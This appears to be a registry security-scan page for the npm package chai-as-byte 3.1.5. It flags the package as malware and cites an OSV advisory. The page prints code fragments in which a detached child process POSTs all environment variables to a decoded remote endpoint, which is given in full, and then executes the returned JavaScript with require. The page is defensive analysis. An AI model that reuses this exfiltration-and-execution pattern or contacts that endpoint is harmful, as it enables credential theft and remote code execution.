registry  /  chai-as-byte  /  3.1.5

chai-as-byte@3.1.5

This document describes the management of vulnerabilities for the project and all modules within the organization.

AI Security Review

scanned 13m ago · by lpm-firewall-ai

Runtime invocation of the exported middleware launches a detached Node child. That child exfiltrates all environment variables to a concealed remote endpoint and executes the returned JavaScript with Node's `require` capability.

Static reason
One or more suspicious static signals were detected.; source fingerprint signature matched known malicious package; routed for review
Trigger
User application invokes the middleware exported by `index.js`.
Impact
Credential theft and arbitrary code execution in the consuming application's environment.
Mechanism
Detached env exfiltration followed by remote JavaScript execution.
Attack narrative
`index.js` starts `lib/initializeCaller.js` in a detached, unobserved Node process when its exported middleware is called. The helper decodes a concealed URL, sends a POST body containing all environment variables, then passes the response body to `new Function("require", ...)` and invokes it. The server therefore receives secrets and controls code executed in the host process context.
Rationale
The package contains a concrete runtime exfiltration-and-remote-execution chain unrelated to its stated middleware/logger behavior. Absence of install hooks does not mitigate execution when consumers invoke the exported API.
Evidence
package.jsonindex.jslib/initializeCaller.js
Network endpoints1
ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df

OSV Corroboration

OpenSSF/OSV
Advisory
MAL-2026-10630
Source
OpenSSF Malicious Packages via OSV
Summary
The package contains a concrete runtime exfiltration-and-remote-execution chain unrelated to its stated middleware/logger behavior. Absence of install hooks does not mitigate execution when consumers invoke the exported API.
References

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `index.js` exports middleware that spawns a detached child.
  • `lib/initializeCaller.js` POSTs the full `process.env`.
  • The Base64 endpoint decodes to `https://ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df`.
  • `lib/initializeCaller.js` executes server response with `new Function` and `require`.
  • Child uses detached mode, ignored stdio, and `unref`, hiding runtime activity.
Evidence against
  • `package.json` has no preinstall/install/postinstall lifecycle hook.
  • No package-source filesystem write or AI-agent configuration mutation was found.
Behavioral surface
Source
ChildProcessEnvironmentVarsEvalNetwork
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 16 file(s), 52.3 KB of source, external domains: github.com

Source & flagged code

7 flagged · loading source
index.jsView file
3const path = require('path'); L4: const { spawn } = require('child_process'); L5: const { DEFAULT_LEVELS, SORTING_ORDER } = require('./lib/constants');
High
Child Process

Package source references child process execution.

index.jsView on unpkg · L3
3Cross-file remote execution chain: index.js spawns lib/initializeCaller.js; helper contains network access plus dynamic code execution. L3: const path = require('path'); L4: const { spawn } = require('child_process'); L5: const { DEFAULT_LEVELS, SORTING_ORDER } = require('./lib/constants'); ... L37: function runBackgroundTask(args) { L38: const scriptPath = path.resolve(__dirname, './lib/initializeCaller.js'); L39:
High
Cross File Remote Execution Context

Source spawns a local helper that also contains network and dynamic execution context; review data flow before blocking.

index.jsView on unpkg · L3
matchType = malicious_source_fingerprint_signature signature = b37b7f32e1e38926 signatureType = suspicious_hashes sourceLabel = final_verdict:malicious matchedPackage = chai-as-sets@3.1.3 matchedPath = index.js matchedIdentity = npm:Y2hhaS1hcy1zZXRz:3.1.3 similarity = 1.000 shingleOverlap = 12 summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

index.jsView on unpkg
lib/initializeCaller.jsView file
2L3: const axios = require("axios"); L4: const configEndpoint = "[redacted]"; ... L8: Buffer.from(configEndpoint, 'base64').toString('utf-8'), L9: { ...process.env }, L10: { headers: { "x-secret-header" : "secret" } } ... L12: try { L13: const executor = new Function("require", response.data); L14: executor(require);
High
Same File Env Network Execution

A single source file combines environment access, network access, and code or shell execution; review context before blocking.

lib/initializeCaller.jsView on unpkg · L2
2L3: const axios = require("axios"); L4: const configEndpoint = "[redacted]"; ... L6: (async function initializeCaller(..._args) { L7: const response = await axios.post( L8: Buffer.from(configEndpoint, 'base64').toString('utf-8'), L9: { ...process.env }, L10: { headers: { "x-secret-header" : "secret" } } ... L12: try { L13: const executor = new Function("require", response.data); L14: executor(require);
High
Base64 Obscured Url

Source decodes a Base64-obscured HTTP endpoint at runtime.

lib/initializeCaller.jsView on unpkg · L2
12try { L13: const executor = new Function("require", response.data); L14: executor(require);
Low
Eval

Package source references a known benign dynamic code generation pattern.

lib/initializeCaller.jsView on unpkg · L12
docs/transports.mdView file
550patternName = generic_password severity = medium line = 550 matchedText = password...rd',
Medium
Secret Pattern

Hardcoded password in docs/transports.md

docs/transports.mdView on unpkg · L550

Findings

5 High3 Medium4 Low
HighChild Processindex.js
HighSame File Env Network Executionlib/initializeCaller.js
HighCross File Remote Execution Contextindex.js
HighBase64 Obscured Urllib/initializeCaller.js
HighKnown Malware Source Fingerprint Signatureindex.js
MediumNetwork
MediumEnvironment Vars
MediumSecret Patterndocs/transports.md
LowScripts Present
LowEvallib/initializeCaller.js
LowHigh Entropy Strings
LowUrl Strings